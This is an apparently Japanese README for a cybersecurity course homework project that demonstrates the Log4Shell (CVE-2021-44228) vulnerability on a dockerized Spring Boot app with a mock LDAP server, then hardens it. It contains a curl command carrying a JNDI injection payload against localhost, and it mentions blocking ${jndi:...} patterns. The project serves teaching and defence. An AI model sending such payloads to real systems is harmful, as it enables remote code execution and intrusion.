
SEAS 8405向けLog4Shell(CVE-2021-44228)エクスプロイトデモ。脆弱なSpring Bootアプリ、偽LDAPサーバー、Dockerセットアップ、MITREマッピング、インシデントレスポンス、およびフルスクリーン録画が含まれます。
このプロジェクトは、脆弱なLog4j 2.14.1を使用するDocker化されたJava Webアプリケーションを用いて、Log4Shellの脆弱性(CVE-2021-44228)の悪用と緩和を実証します。この構成には、JNDIインジェクション攻撃経路を実証するための、模擬的な悪意のあるLDAPサーバーも含まれます。
悪用後、Log4jのアップグレード、入力検証、MITRE D3FENDおよびATT&CKの推奨事項の適用により、システムは強化されます。
log4shell-homework9/
├── docker-compose.yml
├── Dockerfile
├── pom.xml
├── ldap_server.py
├── src/...
├── architecture_diagram.png
├── README.md
├── mitigation_report.pdf
docker build -t vulnerable-app .
docker-compose up
アプリは次の場所で実行されます:
http://localhost:8080
python3 ldap_server.py
次のようなリクエストをアプリに送信します:
curl http://localhost:8080?input=${jndi:ldap://localhost:8000/Exploit}
LDAPサーバーがリクエストを受信します(これによりJNDIエクスプロイトがシミュレートされます)。
攻撃を実証した後、システムは次の方法で保護されました:
${jndi:...} パターンのブロック)mitigation_report.pdf を参照してください:
動画が直接アップロードされていない場合は、レポート内のリンクから確認できます。
Serpil Rivas
SEAS 8405 – サイバーセキュリティアーキテクチャ
2025年5月